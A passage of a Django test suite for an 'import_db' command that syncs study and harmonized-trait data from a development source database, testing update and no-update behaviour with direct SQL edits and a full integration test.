model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonization_unit'
field_to_update = 'tag'
new_value = 'asdfghjkl'
source_db_pk_name = 'id'
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_harmonized_trait(self):
"""Updates to harmonized_trait are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTrait
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait'
field_to_update = 'description'
new_value = 'asdfghjkl'
source_db_pk_name = 'harmonized_trait_id'
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_description'))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_harmonized_trait_encoded_value(self):
"""Updates to harmonized_trait_encoded_values are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTraitEncodedValue
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait_encoded_values'
field_to_update = 'value'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
# M2M link updates.
def test_no_update_added_harmonized_trait_set_version_update_reasons(self):
"""A new reason link to an existing harmonized_trait_set_version is imported after an update."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick an allowed reason to create a new link to in the source db.
reason = models.AllowedUpdateReason.objects.get(pk=1)
# Find a harmonized_trait_set_version that this reason isn't linked to yet.
linked_hts_versions = reason.harmonizedtraitsetversion_set.all()
possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
if len(unlinked_hts_versions) < 1:
raise ValueError('The allowed update reason is already linked to all possible datasets.')
hts_version_to_link = list(unlinked_hts_versions)[0]
# Create a new hts_version-allowed_reason link in the source db.
self.cursor.close()
self.source_db.close()
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
harmonized_trait_set_version_id, date_added)
VALUES ({}, {}, '{}');""".format(
reason.pk, hts_version_to_link.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_reason_link_query)
self.source_db.commit()
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen reason is now linked to the hts_version that was picked, in the Django db.
reason.refresh_from_db()
hts_version_to_link.refresh_from_db()
self.assertFalse(hts_version_to_link in reason.harmonizedtraitsetversion_set.all())
self.assertFalse(reason in hts_version_to_link.update_reasons.all())
def test_no_update_removed_harmonized_trait_set_version_update_reasons(self):
"""A harmonized_trait_set_version - reason link that is no longer in the source db is removed after update."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a hts_version to remove the link to in the source db.
hts_version_to_unlink = models.HarmonizedTraitSetVersion.objects.filter(i_version=2).order_by('?').first()
reason_to_unlink = hts_version_to_unlink.update_reasons.all().order_by('?').first()
# Remove the link in the source db.
self.cursor.close()
self.source_db.close()
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
remove_reason_link_query = """DELETE FROM harmonized_trait_set_version_update_reason WHERE
harmonized_trait_set_version_id={} AND
reason_id={}""".format(hts_version_to_unlink.pk, reason_to_unlink.pk)
self.cursor.execute(remove_reason_link_query)
self.source_db.commit()
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen reason is not linked to the hts_version now, in the Django db.
reason_to_unlink.refresh_from_db()
hts_version_to_unlink.refresh_from_db()
self.assertTrue(hts_version_to_unlink in reason_to_unlink.harmonizedtraitsetversion_set.all())
self.assertTrue(reason_to_unlink in hts_version_to_unlink.update_reasons.all())
def test_no_update_add_component_source_traits(self):
"""A new component source trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[source_trait]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_source_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S')
)
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(htrait_to_link in source_trait.source_component_of_harmonized_trait.all())
self.assertFalse(hunit_to_link in source_trait.source_component_of_harmonization_unit.all())
def test_no_update_remove_component_source_traits(self):
"""A deleted component source trait link is removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to remove a link to in the source db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_source_traits=None).order_by('?').first()
htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
component_source_trait = hunit_to_unlink.component_source_traits.all().order_by('?').first()
# Open source db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component source trait link.
remove_component_trait_query = """DELETE FROM component_source_trait WHERE harmonized_trait_id={} AND
harmonization_unit_id={} AND component_trait_id={}""".format(
htrait_to_unlink.pk, hunit_to_unlink.pk, component_source_trait.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_source_trait.refresh_from_db()
htrait_to_unlink.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertTrue(htrait_to_unlink in component_source_trait.source_component_of_harmonized_trait.all())
self.assertTrue(hunit_to_unlink in component_source_trait.source_component_of_harmonization_unit.all())
def test_no_update_add_component_batch_traits(self):
"""A new component batch trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[source_trait]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_batch_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(htrait_to_link in source_trait.batch_component_of_harmonized_trait.all())
self.assertFalse(hunit_to_link in source_trait.batch_component_of_harmonization_unit.all())
def test_no_update_remove_component_batch_traits(self):
"""A deleted component batch trait link is removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a batch trait to remove a link to in the batch db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_batch_traits=None).order_by('?').first()
htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
component_batch_trait = hunit_to_unlink.component_batch_traits.all().order_by('?').first()
# Open batch db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component batch trait link.
remove_component_trait_query = """DELETE FROM component_batch_trait WHERE harmonized_trait_id={} AND
harmonization_unit_id={} AND component_trait_id={}""".format(
htrait_to_unlink.pk, hunit_to_unlink.pk, component_batch_trait.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_batch_trait.refresh_from_db()
htrait_to_unlink.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertTrue(htrait_to_unlink in component_batch_trait.batch_component_of_harmonized_trait.all())
self.assertTrue(hunit_to_unlink in component_batch_trait.batch_component_of_harmonization_unit.all())
def test_no_update_add_component_age_traits(self):
"""A new component source trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[source_trait]))[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_age_trait (harmonization_unit_id, component_trait_id,
date_added) values ('{}', '{}', '{}')""".format(
hunit_to_link.i_id, source_trait.i_trait_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(hunit_to_link in source_trait.age_component_of_harmonization_unit.all())
def test_no_update_remove_component_age_traits(self):
"""A deleted component age trait link is removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to remove a link to in the source db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_age_traits=None).order_by('?').first()
component_age_trait = hunit_to_unlink.component_age_traits.all().order_by('?').first()
# Open source db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component source trait link.
remove_component_trait_query = """DELETE FROM component_age_trait WHERE harmonization_unit_id={} AND
component_trait_id={}""".format(
hunit_to_unlink.pk, component_age_trait.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_age_trait.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertTrue(hunit_to_unlink in component_age_trait.age_component_of_harmonization_unit.all())
def test_no_update_add_component_harmonized_trait_set_versions(self):
"""New component harmonized trait links to existing harmonized trait and harmonization unit are imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a harmonized trait set to create a new link to in the source db.
harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.get(pk=1)
# Find a harmonization_unit which this harmonized trait set isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(
component_harmonized_trait_set_versions__in=[harmonized_trait_set_version]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_harmonized_trait_set (harmonized_trait_id,
harmonization_unit_id, component_trait_set_version_id, date_added) values
('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, harmonized_trait_set_version.i_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
harmonized_trait_set_version.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertFalse(
htrait_to_link in harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
self.assertFalse(
hunit_to_link in harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
def test_no_update_remove_component_harmonized_traits(self):
"""Deleted component harmonized trait links to a harmonized trait and a harmonization unit are removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to remove a link to in the source db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(
component_harmonized_trait_set_versions=None).order_by('?').first()
htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
component_harmonized_trait_set_version = hunit_to_unlink.component_harmonized_trait_set_versions.all().order_by('?').first() # noqa: E501
# Open source db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component source trait link.
remove_component_trait_query = """DELETE FROM component_harmonized_trait_set WHERE harmonized_trait_id={} AND
harmonization_unit_id={} AND component_trait_set_version_id={}""".format(
htrait_to_unlink.pk, hunit_to_unlink.pk, component_harmonized_trait_set_version.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_harmonized_trait_set_version.refresh_from_db()
htrait_to_unlink.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertTrue(
htrait_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
self.assertTrue(
hunit_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
# Tests that run import_db from start to finish.
class IntegrationTest(ClearSearchIndexMixin, BaseTestDataReloadingTestCase):
"""Integration test of the whole management command.
It's very difficult to test just one function at a time here, because of
all the inter-object relationships and the data being pulled from the
source database. So just run one big integration test here rather than
nice unit tests.
"""
@classmethod
def setUpClass(cls):
"""Create a user."""
super().setUpClass()
cls.user = UserFactory.create()
def test_imported_ids_match_source_ids(self):
"""import_db imports all of the primary keys for each model."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check all of the regular models.
pk_names = (
'id',
'accession',
'id',
'id',
'id',
'id',
'id',
'id',
'id',
'source_trait_id',
'harmonized_trait_id',
'id',
'id',
)
tables = (
'global_study',
'study',
'source_study_version',
'subcohort',
'source_dataset',
'harmonized_trait_set',
'allowed_update_reason',
'harmonized_trait_set_version',
'harmonization_unit',
'source_trait',
'harmonized_trait',
'source_trait_encoded_values',
'harmonized_trait_encoded_values',
)
model_names = (
models.GlobalStudy,
models.Study,
models.SourceStudyVersion,
models.Subcohort,
models.SourceDataset,
models.HarmonizedTraitSet,
models.AllowedUpdateReason,
models.HarmonizedTraitSetVersion,
models.HarmonizationUnit,
models.SourceTrait,
models.HarmonizedTrait,
models.SourceTraitEncodedValue,
models.HarmonizedTraitEncodedValue,
)
self.check_imported_pks_match(pk_names, tables, model_names)
# Check all of the M2M relationships.
m2m_tables = (
'component_source_trait',
'component_harmonized_trait_set',
'component_batch_trait',
'component_age_trait',
'component_source_trait',
'component_harmonized_trait_set',
'component_batch_trait',
'harmonized_trait_set_version_update_reason',
)
group_by_fields = (
'harmonized_trait_id',
'harmonized_trait_id',
'harmonized_trait_id',
'harmonization_unit_id',
'harmonization_unit_id',
'harmonization_unit_id',
'harmonization_unit_id',
'harmonized_trait_set_version_id',
)
concat_fields = (
'component_trait_id',
'component_trait_set_version_id',
'component_trait_id',
'component_trait_id',
'component_trait_id',
'component_trait_set_version_id',
'component_trait_id',
'reason_id',
)
parent_models = (
models.HarmonizedTrait,
models.HarmonizedTrait,
models.HarmonizedTrait,
models.HarmonizationUnit,
models.HarmonizationUnit,
models.HarmonizationUnit,
models.HarmonizationUnit,
models.HarmonizedTraitSetVersion,
)
m2m_att_names = (
'component_source_traits',
'component_harmonized_trait_set_versions',
'component_batch_traits',
'component_age_traits',
'component_source_traits',
'component_harmonized_trait_set_versions',
'component_batch_traits',
'update_reasons',
)
self.check_imported_m2m_relations_match(
m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
# Load a new study and run all of these checks again.
self.cursor.close()
self.source_db.close()
load_test_source_db_data('new_study.sql')
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Check all of the regular models again.
self.check_imported_pks_match(pk_names, tables, model_names)
# Check all of the M2M relationships again.
self.check_imported_m2m_relations_match(
m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
# Check that search indices are added.
self.assertEqual(watson.filter(models.SourceTrait, '').count(),
models.SourceTrait.objects.all().count())
self.assertEqual(watson.filter(models.HarmonizedTrait, '').count(),
models.HarmonizedTrait.objects.all().count())
def test_updated_data_from_every_table(self):
"""Every kind of update is detected and imported by import_db."""
# This test is largely just all of the methods from UpdateModelsTestCase all put together.
# Initial call of the import command.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
t1 = timezone.now()
new_value = 'asdfghjkl' # Use this value to reset things in multiple models.
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
# Update the global study table.
global_study = models.GlobalStudy.objects.all()[0]
sleep(1)
change_data_in_table(
'global_study', 'name', new_value, global_study._meta.pk.name.replace('i_', ''), global_study.pk)
# Update the study table.
study = models.Study.objects.all()[0]
change_data_in_table('study', 'study_name', new_value, study._meta.pk.name.replace('i_', ''), study.pk)
# Update the source study version table.
source_study_version = models.SourceStudyVersion.objects.all()[0]
new_is_deprecated = int(not source_study_version.i_is_deprecated)
change_data_in_table(
'source_study_version', 'is_deprecated', new_is_deprecated,
source_study_version._meta.pk.name.replace('i_', ''), source_study_version.pk)
# Update source dataset table.
source_dataset = models.SourceDataset.objects.all()[0]
new_description = '23oriuam.sadflkj'
change_data_in_table(
'source_dataset', 'dbgap_description', new_description, source_dataset._meta.pk.name.replace('i_', ''),
source_dataset.pk)
# Update the subcohort table.
subcohort = models.Subcohort.objects.get(pk=1)
change_data_in_table('subcohort', 'name', new_value, subcohort._meta.pk.name.replace('i_', ''), subcohort.pk)
# Update source trait table.
source_trait = models.SourceTrait.objects.all()[0]
change_data_in_table('source_trait', 'dbgap_comment', new_value, 'source_trait_id', source_trait.pk)
# Update source trait encoded values table.
sev = models.SourceTraitEncodedValue.objects.all()[0]
change_data_in_table(
'source_trait_encoded_values', 'value', new_value, sev._meta.pk.name.replace('i_', ''), sev.pk)
# Update harmonized trait set table.
harmonized_trait_set = models.HarmonizedTraitSet.objects.all()[0]
change_data_in_table(
'harmonized_trait_set', 'trait_set_name', new_value, harmonized_trait_set._meta.pk.name.replace('i_', ''),
harmonized_trait_set.pk)
# Update harmonized trait set version table.
harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.all()[0]
change_data_in_table(
'harmonized_trait_set_version', 'harmonized_by',
new_value, harmonized_trait_set_version._meta.pk.name.replace('i_', ''), harmonized_trait_set_version.pk
)
# Don't update allowed update reason table, because it should NOT change.
# Update harmonization unit table.
harmonization_unit = models.HarmonizationUnit.objects.all()[0]
change_data_in_table(
'harmonization_unit', 'tag', new_value, harmonization_unit._meta.pk.name.replace('i_', ''),
harmonization_unit.pk
)
# Update harmonized trait table.
harmonized_trait = models.HarmonizedTrait.objects.all()[0]
change_data_in_table('harmonized_trait', 'description', new_value, 'harmonized_trait_id', harmonized_trait.pk)
# Update harmonized trait encoded values table.
hev = models.HarmonizedTraitEncodedValue.objects.all()[0]
change_data_in_table(
'harmonized_trait_encoded_values', 'value', new_value, hev._meta.pk.name.replace('i_', ''), hev.pk)
# Prep for doing updates for m2m tables.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add a component source trait.
component_source_trait = models.SourceTrait.objects.order_by('?').first()
hunit_to_link_source = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[component_source_trait]))[0]
htrait_to_link_source = hunit_to_link_source.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
add_component_trait_query = """INSERT INTO component_source_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link_source.i_trait_id, hunit_to_link_source.i_id, component_source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
# Add a component batch trait.
component_batch_trait = models.SourceTrait.objects.order_by('?').first()
hunit_to_link_batch = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[component_batch_trait]))[0]
htrait_to_link_batch = hunit_to_link_batch.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
add_component_trait_query = """INSERT INTO component_batch_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link_batch.i_trait_id, hunit_to_link_batch.i_id, component_batch_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
# Add a component age trait.
component_age_trait = models.SourceTrait.objects.order_by('?').first()
hunit_to_link_age = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[component_age_trait]))[0]
add_component_trait_query = """INSERT INTO component_age_trait (harmonization_unit_id, component_trait_id,
date_added) values ('{}', '{}', '{}')""".format(
hunit_to_link_age.i_id, component_age_trait.i_trait_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
# Add a component harmonized trait set version.
component_harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.order_by('?').first()
hunit_to_link_harmonized = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(
component_harmonized_trait_set_versions__in=[component_harmonized_trait_set_version]))[0]
htrait_to_link_harmonized = hunit_to_link_harmonized.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
add_component_trait_query = """INSERT INTO component_harmonized_trait_set (harmonized_trait_id,
harmonization_unit_id, component_trait_set_version_id, date_added) values
('{}', '{}', '{}', '{}')""".format(
htrait_to_link_harmonized.i_trait_id, hunit_to_link_harmonized.i_id,
component_harmonized_trait_set_version.i_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S')
)
self.cursor.execute(add_component_trait_query)
# Add an update reason to a harmonized trait set version.
reason_to_link = models.AllowedUpdateReason.objects.get(pk=1)
linked_hts_versions = reason_to_link.harmonizedtraitsetversion_set.all()
possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
hts_version_to_link_reason = list(unlinked_hts_versions)[0]
add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
harmonized_trait_set_version_id, date_added)
VALUES ({}, {}, '{}');""".format(
reason_to_link.pk, hts_version_to_link_reason.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_reason_link_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Run the update command.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Refresh models from the db.
global_study.refresh_from_db()
study.refresh_from_db()
source_study_version.refresh_from_db()
source_dataset.refresh_from_db()
subcohort.refresh_from_db()
source_trait.refresh_from_db()
sev.refresh_from_db()
harmonized_trait_set.refresh_from_db()
harmonized_trait_set_version.refresh_from_db()
harmonization_unit.refresh_from_db()
harmonized_trait.refresh_from_db()
hev.refresh_from_db()
component_source_trait.refresh_from_db()
htrait_to_link_source.refresh_from_db()
hunit_to_link_source.refresh_from_db()
component_batch_trait.refresh_from_db()
htrait_to_link_batch.refresh_from_db()
hunit_to_link_batch.refresh_from_db()
component_age_trait.refresh_from_db()
hunit_to_link_age.refresh_from_db()
component_harmonized_trait_set_version.refresh_from_db()
htrait_to_link_harmonized.refresh_from_db()
hunit_to_link_harmonized.refresh_from_db()
reason_to_link.refresh_from_db()
hts_version_to_link_reason.refresh_from_db()
# Check that modified date > created date, values are updated, for each model.
self.assertEqual(new_value, global_study.i_name)
self.assertTrue(global_study.modified > t1)
self.assertEqual(new_value, study.i_study_name)
self.assertTrue(study.modified > t1)
self.assertEqual(new_is_deprecated, source_study_version.i_is_deprecated)
self.assertTrue(source_study_version.modified > t1)
self.assertEqual(new_description, source_dataset.i_dbgap_description)
self.assertTrue(source_dataset.modified > t1)
self.assertEqual(new_value, subcohort.i_name)
self.assertTrue(subcohort.modified > t1)
self.assertEqual(new_value, source_trait.i_dbgap_comment)
self.assertTrue(source_trait.modified > t1)
self.assertEqual(new_value, sev.i_value)
self.assertTrue(sev.modified > t1)
self.assertEqual(new_value, harmonized_trait_set.i_trait_set_name)
self.assertTrue(harmonized_trait_set.modified > t1)
